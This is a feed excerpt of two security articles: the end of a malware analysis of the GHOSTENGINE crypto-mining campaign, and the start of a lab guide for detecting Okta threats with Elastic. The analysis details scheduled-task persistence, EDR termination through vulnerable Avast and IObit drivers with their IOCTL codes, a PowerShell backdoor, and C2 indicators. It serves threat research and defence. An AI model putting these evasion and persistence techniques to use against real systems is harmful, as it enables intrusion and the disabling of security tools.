<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image6.png" alt="get.png disabling Windows Defender and enabling remote services" title="get.png disabling Windows Defender and enabling remote services" /></p>
<p><code>get.png</code> also verifies that the <code>C:\</code> volume has at least 10 MB of free space to download files, storing them in <code>C:\Windows\Fonts</code>. If not, it will try to delete large files from the system before looking for another suitable volume with sufficient space and creating a folder under <code>$RECYCLE.BIN\Fonts</code>.</p>
<p>To get the current DNS resolution for the C2 domain names, GHOSTENGINE uses a hardcoded list of DNS servers, <code>1.1.1.1</code> and <code>8.8.8.8</code>.</p>
<p>Next, to establish persistence, <code>get.png</code> creates the following scheduled tasks as <code>SYSTEM</code>:</p>
<ul>
<li><strong>OneDriveCloudSync</strong> using <code>msdtc </code>to run  the malicious service DLL <code>C:\Windows\System32\oci.dll</code> every 20 minutes (described later)</li>
<li><strong>DefaultBrowserUpdate</strong> to run <code>C:\Users\Public\run.bat,</code> which downloads the <code>get.png</code> script and executes it every 60 minutes</li>
<li><strong>OneDriveCloudBackup</strong> to execute <code>C:\Windows\Fonts\smartsscreen.exe</code> every 40 minutes</li>
</ul>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image21.png" alt="Scheduled tasks for persistence" title="Scheduled tasks for persistence" /></p>
<p><code>get.png</code> terminates all <code>curl.exe</code> processes and any PowerShell process with <code>*get.png*</code> in its command line, excluding the current process. This is a way to terminate any concurrently running instance of the malware.</p>
<p>This script then downloads  <code>config.txt</code>, a JSON file containing the hashes of the PE files it retrieved. This file verifies whether any updated binaries are to be downloaded by checking the hashes of the previously downloaded files from any past infections.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image9.png" alt="config.txt file used to check for updated binaries" title="config.txt file used to check for updated binaries" /></p>
<p>Finally,<code> get.png</code> downloads all of its modules and various PE files. Below is a table containing a description of each downloaded file:</p>
<table>
<thead>
<tr>
<th>path</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>C:\Windows\System32\drivers\aswArPots.sys</code></td>
<td>Kernel driver</td>
<td>Vulnerable driver from Avast</td>
</tr>
<tr>
<td><code>C:\Windows\System32\drivers\IObitUnlockers.sys</code></td>
<td>Kernel driver</td>
<td>Vulnerable driver from IObit</td>
</tr>
<tr>
<td><code>C:\Windows\Fonts\curl.exe</code></td>
<td>PE executable</td>
<td>Used to download files via cURL</td>
</tr>
<tr>
<td><code>C:\Windows\Fonts\smartsscreen.exe</code></td>
<td>PE executable</td>
<td>Core payload (GHOSTENGINE), its main purpose is to deactivate security instrumentation, complete initial infection, and execute the miner.</td>
</tr>
<tr>
<td><code>C:\Windows\System32\oci.dll</code></td>
<td>Service DLL</td>
<td>Persistence/updates module</td>
</tr>
<tr>
<td><code>backup.png</code></td>
<td>Powershell script</td>
<td>Backdoor module</td>
</tr>
<tr>
<td><code>kill.png</code></td>
<td>Powershell script</td>
<td>A PowerShell script that injects and executes a PE file responsible for killing security sensors</td>
</tr>
</tbody>
</table>
<h3>GHOSTENGINE modules</h3>
<p>GHOSTENGINE deploys several modules that can tamper with security tools, create a backdoor, and check for software updates.</p>
<h4>EDR agent controller and miner module: smartsscreen.exe</h4>
<p>This module primarily terminates any active EDR agent processes before downloading and installing a crypto-miner.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image20.png" alt="smartscreen.exe GHOSTENGINE module" title="smartscreen.exe GHOSTENGINE module" /></p>
<p>The malware scans and compares all the running processes with a hardcoded list of known EDR agents. If there are any matches, it first terminates the security agent by leveraging the Avast Anti-Rootkit Driver file <code>aswArPots.sys</code> with the IOCTL <code>0x7299C004</code> to terminate the process by PID.</p>
<p><code>smartscreen.exe</code> is then used to delete the security agent binary with another vulnerable driver, <code>iobitunlockers.sys</code> from IObit, with the IOCTL <code>0x222124</code>.</p>
<p><code>smartscreen.exe</code> then downloads the XMRig client mining program (<code>WinRing0x64.png</code>) from the C2 server as <code>taskhostw.png</code>. Finally, it executes XMRig, its drivers, and the configuration file <code>config.json</code>, starting the mining process.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image19.png" alt="smartscreen.exe executing XMRig" title="smartscreen.exe executing XMRig" /></p>
<h4>Update/Persistence module: oci.dll</h4>
<p>The PowerShell script creates a service DLL (<code>oci.dll</code>), a phantom DLL loaded by <code>msdtc</code>. The DLL's architecture varies depending on the machine; it can be 32-bit or 64-bit. Its primary function is to create system persistence and download any updates from the C2 servers by downloading the <code>get.png</code> script from the C2 and executing it.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image3.png" alt="oci.dll persistence/update mechanism" title="oci.dll persistence/update mechanism" /></p>
<p>Every time the &lt;code&gt;msdtc&lt;strong&gt; &lt;/strong&gt;&lt;/code&gt;service starts, it will load &lt;code&gt;oci.dll&lt;/code&gt; to spawn the PowerShell one-liner that executes &lt;code&gt;get.png&lt;/code&gt; :</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image23.png" alt="oci.dll downloading and executing get.png" title="oci.dll downloading and executing get.png" /></p>
<h4>EDR agent termination module: <code>kill.png</code></h4>
<p><code>kill.png</code> is a PowerShell script that injects shellcode into the current process, decrypting and loading a PE file into memory.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image24.png" alt="kill.png injecting shellcode" title="kill.png injecting shellcode" /></p>
<p>This module is written in C++, and the authors have integrated redundancy into its operation. This redundancy is evident in the replication of the technique used in <code>smartsscreen.exe</code> to terminate and delete EDR agent binaries; it continuously scans for any new processes.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image7.png" alt="kill.png hardcoded security agent monitoring list" title="kill.png hardcoded security agent monitoring list" /></p>
<h4>Powershell backdoor module: <code>backup.png</code></h4>
<p>The PowerShell script functions like a backdoor, enabling remote command execution on the system. It continually sends a Base64-encoded JSON object containing a unique ID, derived from the current time and the computer name while awaiting base64-encoded commands. The results of those commands are then sent back.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image18.png" alt="backup.png operating as a backdoor" title="backup.png operating as a backdoor" /></p>
<p>In this example <code>eyJpZCI6IjE3MTU2ODYyNDA3MjYyNiIsImhvc3QiOiJhbmFseXNpcyJ9</code> is the Base64-encoded JSON object:</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image16.png" alt="C2 Communication example of backup.png" title="backup.png HTTP header information" /></p>
<pre><code>$ echo &quot;eyJpZCI6IjE3MTU2ODYyNDA3MjYyNiIsImhvc3QiOiJhbmFseXNpcyJ9&quot; | base64 -D
{&quot;id&quot;:&quot;171568624072626&quot;,&quot;host&quot;:&quot;analysis&quot;}
</code></pre>
<h2>Miner configuration</h2>
<p>XMRig is a legitimate crypto miner, and they have documented the configuration file usage and elements <a href="https://xmrig.com/docs/miner/config">here</a>. As noted at the beginning of this publication, the ultimate goal of the REF4578 intrusion set was to gain access to an environment and deploy a persistent Monero crypto miner, XMRig.</p>
<p>We extracted the configuration file from the miner, which was tremendously valuable as it allowed us to report on the Monero Payment ID and track the worker and pool statistics, mined cryptocurrency, transaction IDs, and withdrawals.</p>
<p>Below is an excerpt from the REF4578 XMRig configuration file:</p>
<pre><code>{
    &quot;autosave&quot;: false,
    &quot;background&quot;: true,
    &quot;colors&quot;: true,

...truncated...

    &quot;donate-level&quot;: 0,
    &quot;donate-over-proxy&quot;: 0,
    &quot;pools&quot;: [
        {
            &quot;algo&quot;: &quot;rx/0&quot;,
            &quot;coin&quot;: &quot;monero&quot;,
            &quot;url&quot;: &quot;pool.supportxmr[.]com:443&quot;,
            &quot;user&quot;: &quot;468ED2Qcchk4shLbD8bhbC3qz2GFXqjAUWPY3VGbmSM2jfJw8JpSDDXP5xpkMAHG98FHLmgvSM6ZfUqa9gvArUWP59tEd3f&quot;,
            &quot;keepalive&quot;: true,
            &quot;tls&quot;: true

...truncated...

    &quot;user-agent&quot;: &quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36&quot;,
    &quot;verbose&quot;: 0,
    &quot;watch&quot;: true,
    &quot;pause-on-battery&quot;: false,
    &quot;pause-on-active&quot;: false
}
</code></pre>
<h3>Monero Payment ID</h3>
<p>Monero is a blockchain cryptocurrency focusing on obfuscation and fungibility to ensure anonymity and privacy. The <a href="https://www.getmonero.org/resources/moneropedia/paymentid.html">Payment ID</a> is an arbitrary and optional transaction attachment that consists of 32 bytes (64 hexadecimal characters) or 8 bytes (in the case of integrated addresses).</p>
<p>Using the Payment ID from the above configuration excerpt (<code>468ED2Qcchk4shLbD8bhbC3qz2GFXqjAUWPY3VGbmSM2jfJw8JpSDDXP5xpkMAHG98FHLmgvSM6ZfUqa9gvArUWP59tEd3f</code>) we can view the worker and pool statistics on one of the <a href="https://monero.hashvault.pro/en/">Monero Mining Pool site</a>s listed in the configuration.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image22.png" alt="Worker and pool statistics of the REF4578 Payment ID" title="Worker and pool statistics of the REF4578 Payment ID" /></p>
<p>Additionally, we can see the transaction hashes, which we can look up on the Monero blockchain explorer. Note that while transactions date back four months ago, this only indicates the <em>potential</em> monetary gain by this specific worker and account.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image2.png" alt="Payments for the REF4578 Payment ID" title="Payments for the REF4578 Payment ID" /></p>
<p>Using the Blockchain Explorer and one of the <a href="https://monero.hashvault.pro/explorer/prove/7c106041de7cc4c86cb9412a43cb7fc0a6ad2c76cfdb0e03a8ef98dd9e744442/468ED2Qcchk4shLbD8bhbC3qz2GFXqjAUWPY3VGbmSM2jfJw8JpSDDXP5xpkMAHG98FHLmgvSM6ZfUqa9gvArUWP59tEd3f/f1415e7710323cf769ce74d57ec9b7337d7a61b9ee4bba2ee38f9e8c3c067a005a484f8b9a14fb8964f56bb76181eafdb7dbb00677a155b067204423f23ab50ad146867795f560ad9443520f073f0bd71b8afd3259b24ae2a59aa7772f68fc028388f001bfeaa0f4ccc1f547b54924bb116352e9302424d731dc580dcccbb40749503640895d31559d7fc258b616576e7f052bbdbbc7083126f595c36015de02f6e95da8cfc81ee5fa1bd4d4c29bf55db96e4779924ab0d26993f7bf834ceb01fe314fd19e55c7304f91e809be3e29b68778f0da6dbcfe57d3eafc6dae5e090645d6b3753f44c4e1c1356b19d406c6efe7a55ec7c2b4997bd1fc65f15a4fda03619fc53beff111ddd9fd94f5ba3c503ccb73f52009bd3c1d47216b9a7c82d5065ac5e8a946e998cbc23fd8815a93cbbd655961709ac3ea8b1fd87e940e72370dc542ca4c22837e91ab5dd94d2c1c0a81e8ec9558766575ba236c3ae29b0f470fe881e22a03da405118a3353a5ecc618d1837e1a2bd449888a47a761efa98c407ce857fd389cdea63e9670edcf4b4d6c4c33e9c2851430270c8ef6dfb8cfeb9025ca7a17c9acdbfeb6670b3eabcbfde36cbc907e23fdd0c64aa2fc4103412a70c97838e177184c2f3d794e089b47ce66656d6c4cab2bbb4d6d71a3245f1dc360c7da9220eec90ef6e67cb13831b52ef14cf5bf1dd6adc202edc0892d9529145047786ed1042857f6986ed608839d595f06c1971f415f967d260d17ea8f5582400">transaction hashes</a> we got from the Payment ID, we can see the public key, the amount is withdrawn, and when. Note that these public keys are used with one-time addresses, or stealth addresses that the adversary would then use a private key with to unlock the funds.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image17.png" alt="Transactions for the REF4578 Payment ID" title="Transactions for the REF4578 Payment ID" /></p>
<p>In the above example for transaction <code>7c106041de7cc4c86cb9412a43cb7fc0a6ad2c76cfdb0e03a8ef98dd9e744442</code> we can see that there was a withdrawal of <code>0.109900000000</code> XMR (the abbreviation for Monero) totaling $14.86 USD. The Monerao Mining Pool site shows four transactions of approximately the same amount of XMR, totaling approximately $60.70 USD (January - March 2024).</p>
<p>As of the publication of this research, there are still active miners connected to the REF4578 Payment ID.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image5.png" alt="Miners actively connecting to the REF4578 Payment ID" title="Miners actively connecting to the REF4578 Payment ID" /></p>
<p>While this specific Payment ID does not appear to be a big earner, it is evident that REF4578 could operate this intrusion set successfully. Other victims of this campaign could have different Payment IDs used to track intrusions, which could be combined for a larger overall haul.</p>
<h2>Malware and MITRE ATT&amp;CK</h2>
<p>Elastic uses the <a href="https://attack.mitre.org/">MITRE ATT&amp;CK</a> framework to document common tactics, techniques, and procedures that threats use against enterprise networks.</p>
<h3>Tactics</h3>
<p>Tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.</p>
<ul>
<li><a href="https://attack.mitre.org/tactics/TA0002/">Execution</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0003">Persistence</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0005/">Defense Evasion</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0007">Discovery</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0011">Command and Control</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0010/">Exfiltration</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0040/">Impact</a></li>
</ul>
<h3>Techniques</h3>
<p>Techniques represent how an adversary achieves a tactical goal by performing an action.</p>
<ul>
<li><a href="https://attack.mitre.org/techniques/T1059/001/">Command and Scripting Interpreter: PowerShell</a></li>
<li><a href="https://attack.mitre.org/techniques/T1059/003/">Command and Scripting Interpreter: Windows Command Shell</a></li>
<li><a href="https://attack.mitre.org/techniques/T1053/005/">Scheduled Task/Job: Scheduled Task</a></li>
<li><a href="https://attack.mitre.org/techniques/T1070/001/">Indicator Removal: Clear Windows Event Logs</a></li>
<li><a href="https://attack.mitre.org/techniques/T1036/">Masquerading</a></li>
<li><a href="https://attack.mitre.org/techniques/T1055/">Process Injection</a></li>
<li><a href="https://attack.mitre.org/techniques/T1057/">Process Discovery</a></li>
<li><a href="https://attack.mitre.org/techniques/T1041/">Exfiltration Over C2 Channel</a></li>
<li><a href="https://attack.mitre.org/techniques/T1132">Data Encoding</a></li>
<li><a href="https://attack.mitre.org/techniques/T1496/">Resource Hijacking</a></li>
<li><a href="https://attack.mitre.org/techniques/T1489/">Service Stop</a></li>
</ul>
<h2>Mitigating GHOSTENGINE</h2>
<h3>Detection</h3>
<p>The first objective of the GHOSTENGINE malware is to incapacitate endpoint security solutions and disable specific Windows event logs, such as Security and System logs,  which record process creation and service registration. Therefore, it is crucial to prioritize the detection and prevention of these initial actions:</p>
<ul>
<li>Suspicious PowerShell execution</li>
<li>Execution from unusual directories</li>
<li>Elevating privileges to system integrity</li>
<li>Deploying vulnerable drivers and establishing associated kernel mode services.</li>
</ul>
<p>Once the vulnerable drivers are loaded, detection opportunities decrease significantly, and organizations must find compromised endpoints that stop transmitting logs to their SIEM.</p>
<p>Network traffic may generate and be identifiable if DNS record lookups point to <a href="https://miningpoolstats.stream/monero">known mining pool</a> domains over well-known ports such as HTTP (<code>80</code>) and HTTPS  (<code>443</code>). Stratum is also another popular network protocol for miners, by default, over port <code>4444</code>.</p>
<p>The analysis of this intrusion set revealed the following detection rules and behavior prevention events:</p>
<ul>
<li><a href="https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/behavior/rules/execution_suspicious_powershell_downloads.toml">Suspicious PowerShell Downloads</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/79f575b33c747e0c3c5f7293c95f3ddab611e683/rules/windows/privilege_escalation_service_control_spawned_script_int.toml">Service Control Spawned via Script Interpreter</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/79f575b33c747e0c3c5f7293c95f3ddab611e683/rules/windows/persistence_local_scheduled_task_creation.toml">Local Scheduled Task Creation</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/79f575b33c747e0c3c5f7293c95f3ddab611e683/rules/windows/defense_evasion_from_unusual_directory.toml">Process Execution from an Unusual Directory</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/79f575b33c747e0c3c5f7293c95f3ddab611e683/rules/windows/execution_command_shell_started_by_svchost.toml#L41">Svchost spawning Cmd</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/79f575b33c747e0c3c5f7293c95f3ddab611e683/rules/windows/execution_command_shell_started_by_svchost.toml#L41">Unusual Parent-Child Relationship</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/79f575b33c747e0c3c5f7293c95f3ddab611e683/rules/windows/defense_evasion_clearing_windows_event_logs.toml">Clearing Windows Event Logs</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/79f575b33c747e0c3c5f7293c95f3ddab611e683/rules/windows/defense_evasion_microsoft_defender_tampering.toml">Microsoft Windows Defender Tampering</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/behavior/rules/privilege_escalation_potential_privilege_escalation_via_missing_dll.toml">Potential Privilege Escalation via Missing DLL</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/behavior/rules/defense_evasion_binary_masquerading_via_untrusted_path.toml#L58">Binary Masquerading via Untrusted Path</a></li>
</ul>
<h3>Prevention</h3>
<p>Malicious Files Prevention :</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image1.png" alt="GHOSTENGINE file prevention" title="GHOSTENGINE file prevention" /></p>
<p>Shellcode Injection Prevention:</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image14.png" alt="GHOSTENGINE shellcode prevention" title="GHOSTENGINE shellcode prevention" /></p>
<p>Vulnerable Drivers file creation prevention (<a href="https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/yara/rules/Windows_VulnDriver_ArPot.yar">Windows.VulnDriver.ArPot</a> and <a href="https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/yara/rules/Windows_VulnDriver_IoBitUnlocker.yar">Windows.VulnDriver.IoBitUnlocker</a> )</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image15.png" alt="GHOSTENGINE driver prevention" title="GHOSTENGINE driver prevention" /></p>
<h4>YARA</h4>
<p>Elastic Security has created YARA rules to identify this activity.</p>
<ul>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_GhostEngine.yar">Windows Trojan GHOSTENGINE</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/yara/rules/Windows_VulnDriver_ArPot.yar">Windows.VulnDriver.ArPot</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/yara/rules/Windows_VulnDriver_IoBitUnlocker.yar">Windows.VulnDriver.IoBitUnlocker</a></li>
</ul>
<h2>Observations</h2>
<p>All observables are also available for <a href="https://github.com/elastic/labs-releases/tree/main/indicators/ghostengine">download</a> in both ECS and STIX format.</p>
<p>The following observables were discussed in this research.</p>
<table>
<thead>
<tr>
<th>Observable</th>
<th>Type</th>
<th>Name</th>
<th>Reference</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>2fe78941d74d35f721556697491a438bf3573094d7ac091b42e4f59ecbd25753</code></td>
<td>SHA-256</td>
<td><code>C:\Windows\Fonts\smartsscreen.exe</code></td>
<td>GHOSTENGINE EDR controller module</td>
</tr>
<tr>
<td><code>4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1</code></td>
<td>SHA-256</td>
<td><code>C:\Windows\System32\drivers\aswArPots.sys</code></td>
<td>Avast vulnerable driver</td>
</tr>
<tr>
<td><code>2b33df9aff7cb99a782b252e8eb65ca49874a112986a1c49cd9971210597a8ae</code></td>
<td>SHA-256</td>
<td><code>C:\Windows\System32\drivers\IObitUnlockers.sys</code></td>
<td>Iobit vulnerable driver</td>
</tr>
<tr>
<td><code>3ced0552b9ecf3dfecd14cbcc3a0d246b10595d5048d7f0d4690e26ecccc1150</code></td>
<td>SHA-256</td>
<td><code>C:\Windows\System32\oci.dll</code></td>
<td>Update/Persistence module (64-bit)</td>
</tr>
<tr>
<td><code>3b2724f3350cb5f017db361bd7aae49a8dbc6faa7506de6a4b8992ef3fd9d7ab</code></td>
<td>SHA-256</td>
<td><code>C:\Windows\System32\oci.dll</code></td>
<td>Update/Persistence module (32-bit)</td>
</tr>
<tr>
<td><code>35eb368c14ad25e3b1c58579ebaeae71bdd8ef7f9ccecfc00474aa066b32a03f</code></td>
<td>SHA-256</td>
<td><code>C:\Windows\Fonts\taskhostw.exe</code></td>
<td>Miner client</td>
</tr>
<tr>
<td><code>786591953336594473d171e269c3617d7449876993b508daa9b96eedc12ea1ca</code></td>
<td>SHA-256</td>
<td><code>C:\Windows\Fonts\config.json</code></td>
<td>Miner configuration file</td>
</tr>
<tr>
<td><code>11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5</code></td>
<td>SHA-256</td>
<td><code>C:\Windows\Fonts\WinRing0x64.sys</code></td>
<td>Miner driver</td>
</tr>
<tr>
<td><code>aac7f8e174ba66d62620bd07613bac1947f996bb96b9627b42910a1db3d3e22b</code></td>
<td>SHA-256</td>
<td><code>C:\ProgramData\Microsoft\DeviceSync\SystemSync\Tiworker.exe</code></td>
<td>Initial stager</td>
</tr>
<tr>
<td><code>6f3e913c93887a58e64da5070d96dc34d3265f456034446be89167584a0b347e</code></td>
<td>SHA-256</td>
<td><code>backup.png</code></td>
<td>GHOSTENGINE backdoor module</td>
</tr>
<tr>
<td><code>7c242a08ee2dfd5da8a4c6bc86231985e2c26c7b9931ad0b3ea4723e49ceb1c1</code></td>
<td>SHA-256</td>
<td><code>get.png</code></td>
<td>GHOSTENGINE loader</td>
</tr>
<tr>
<td><code>cc4384510576131c126db3caca027c5d159d032d33ef90ef30db0daa2a0c4104</code></td>
<td>SHA-256</td>
<td><code>kill.png</code></td>
<td>GHOSTENGINE EDR termination module</td>
</tr>
<tr>
<td><code>download.yrnvtklot[.]com</code></td>
<td>domain</td>
<td></td>
<td>C2 server</td>
</tr>
<tr>
<td><code>111.90.158[.]40</code></td>
<td>ipv4-addr</td>
<td></td>
<td>C2 server</td>
</tr>
<tr>
<td><code>ftp.yrnvtklot[.]com</code></td>
<td>domain</td>
<td></td>
<td>C2 server</td>
</tr>
<tr>
<td><code>93.95.225[.]137</code></td>
<td>ipv4-addr</td>
<td></td>
<td>C2 server</td>
</tr>
<tr>
<td><code>online.yrnvtklot[.]com</code></td>
<td>domain</td>
<td></td>
<td>C2 server</td>
</tr>
</tbody>
</table>
<h2>References</h2>
<p>The following were referenced throughout the above research:</p>
<ul>
<li><a href="https://www.antiy.com/response/HideShoveling.html">https://www.antiy.com/response/HideShoveling.html</a></li>
</ul>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/ghostengine.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Monitoring Okta threats with Elastic Security]]></title>
            <link>https://www.elastic.co/es/security-labs/monitoring-okta-threats-with-elastic-security</link>
            <guid>monitoring-okta-threats-with-elastic-security</guid>
            <pubDate>Fri, 23 Feb 2024 00:00:00 GMT</pubDate>
            <description><![CDATA[This article guides readers through establishing an Okta threat detection lab, emphasizing the importance of securing SaaS platforms like Okta. It details creating a lab environment with the Elastic Stack, integrating SIEM solutions, and Okta.]]></description>
            <content:encoded><![CDATA[<h2>Preamble</h2>
<p>Welcome to another installment of Okta threat research with Elastic. <a href="https://www.elastic.co/es/security-labs/starter-guide-to-understanding-okta">Previously</a>, we have published articles exploring Okta’s core services and offerings. This article is dedicated to the practical side of cyber defense - setting up a robust Okta threat detection lab. Our journey will navigate through the intricacies of configuring a lab environment using the Elastic Stack, integrating SIEM solutions, and seamlessly connecting with Okta.</p>
<p>The goal of this article is not just to inform but to empower. Whether you're a seasoned cybersecurity professional or a curious enthusiast, our walkthrough aims to equip you with the knowledge and tools to understand and implement advanced threat detection mechanisms for Okta environments. We believe that hands-on experience is the cornerstone of effective cybersecurity practice, and this guide is crafted to provide you with a practical roadmap to enhance your security posture.</p>
<p>As we embark on this technical expedition, remember that the world of cybersecurity is dynamic and ever-evolving. The methods and strategies discussed here are a reflection of the current landscape and best practices. We encourage you to approach this guide with a mindset of exploration and adaptation, as the techniques and tools in cybersecurity are continually advancing.</p>
<p>So, let's dive into our detection lab setup for Okta research.</p>
<h2>Prerequisites</h2>
<p>For starters, an Okta license (a <a href="https://www.okta.com/free-trial/">trial license</a> is fine) is required for this lab setup. This will at least allow us to generate Okta system logs within our environment, which we can then ingest into our Elastic Stack.</p>
<p>Secondarily, after Okta is set up, we can deploy a Windows Server, set up Active Directory (AD), and use the <a href="https://help.okta.com/en-us/content/topics/directory/ad-agent-main.htm">AD integration</a> in Okta to sync AD with Okta for Identity and Access Management (IAM). This step is not necessary for the rest of the lab, however, it can help extend our lab for other exercises and scenarios where endpoint and Okta data are both necessary for hunting.</p>
<h2>Sign up for Okta Workforce Identity</h2>
<p>We will set up a fresh Okta environment for this walkthrough by signing up for a Workforce Identity Cloud trial. If you already have an Okta setup in your environment, then feel free to skip to the <code>Setting Up the Elastic Stack</code> section.</p>
<p>Once signed up for the trial, you are typically presented with a URL containing a trial license subdomain and the email to log into the Okta admin console.</p>
<p>To start, users must pivot over to the email they provided when signing up and follow the instructions of the activation email by Okta, which contains a QR code to scan.</p>
<p>The QR code is linked to the Okta Verify application that is available on mobile devices, iOS and Android. A prompt on the mobile device for multi-factor authentication (MFA) using a phone number and face recognition is requested.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image23.png" alt="Setting up Okta Verify through a mobile device" /></p>
<p><em>Image 1: Setting up Okta Verify through a mobile device</em></p>
<p>Once set up, we are redirected to the Okta admin console to configure MFA using Okta Verify.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image9.png" alt="The Okta Admin console" /></p>
<p><em>Image 2: The Okta Admin console</em></p>
<p>At this point, you should have a trial license for Okta, have setup MFA, and have access to the Okta admin console.</p>
<h2>Setting up your free cloud stack</h2>
<p>For this lab, we will use a <a href="https://cloud.elastic.co/registration">free trial</a> of an Elastic Cloud instance. You also have the option to create the stack in <a href="https://www.elastic.co/es/partners/aws?utm_campaign=Comp-Stack-Trials-AWSElasticsearch-AMER-NA-Exact&amp;utm_content=Elasticsearch-AWS&amp;utm_source=adwords-s&amp;utm_medium=paid&amp;device=c&amp;utm_term=amazon%20elk&amp;gclid=Cj0KCQiA1ZGcBhCoARIsAGQ0kkqI9gFWLvEX--Fq9eE8WMb43C9DsMg_lRI5ov_3DL4vg3Q4ViUKg-saAsgxEALw_wcB">Amazon Web Services</a> (AWS), <a href="https://www.elastic.co/es/guide/en/cloud/current/ec-billing-gcp.html">GCP</a>, or Microsoft Azure if you’d like to set up your stack in an existing cloud service provider (CSP). Ensure you <a href="https://www.elastic.co/es/guide/en/cloud/current/ec-account-user-settings.html#ec-account-security-mfa">enable MFA for your Elastic Cloud environment</a>.</p>
<p>Once registered for the free trial, we can focus on configuring the Elastic Stack deployment. For this lab, we will call our deployment okta-threat-detection and deploy it in GCP. It is fine to leave the default settings for your deployment, and we recommend the latest version for all the latest features. For the purposes of this demo, we use the following:</p>
<ul>
<li>Name: okta-threat-detection</li>
<li>Cloud provider: Google Cloud</li>
<li>Region: Iowa (us-central1)</li>
<li>Hardware profile: Storage optimized</li>
<li>Version: 8.12.0 (latest)</li>
</ul>
<p>The option to adjust additional settings for Elasticsearch, Kibana, Integrations, and more is configurable during this step. However, default settings are fine for this lab exercise. If you choose to leverage the Elastic Stack for a more permanent, long-term strategy, we recommend planning and designing architecturally according to your needs.</p>
<p>Once set, select “Create deployment” and the Elastic Stack will automatically be deployed in GCP (or whatever cloud provider you selected). You can download the displayed credentials as a CSV file or save them wherever you see fit. The deployment takes approximately 5 minutes to complete and once finished, you can select “Continue” to log in. Congratulations, you have successfully deployed the Elastic Stack within minutes!</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/monitoring-okta-threats-with-elastic-security/image14.png" alt="Your newly deployed Elastic stack" /></p>
<p><em>Image 3: Your newly deployed Elastic stack</em></p>
<h2>Setup Fleet from the Security Solution</h2>
<p>As a reminder, <a href="https://www.elastic.co/es/guide/en/fleet/current/fleet-overview.html">Fleet</a> enables the creation and management of an agent policy, which will incorporate the <a href="https://docs.elastic.co/en/integrations/okta">Okta integration</a> on an Elastic Agent. This integration is used to access and ingest Okta logs into our stack.</p>
<h3>Create an Okta policy</h3>
<p>For our Elastic Agent to know which integration it is using, what data to gather, and where to stream that data within our stack, we must first set up a custom Fleet policy we’re naming Okta.</p>
<p>To set up a fleet policy within your Elastic Stack, do the following in your Elastic Stack:</p>
<ol>
<li>Navigation menu &gt; Management &gt; Fleet &gt; Agent Policies &gt; Create agent policy</li>
<li>Enter “Okta” as a name &gt; Create Agent Policy</li>
</ol>
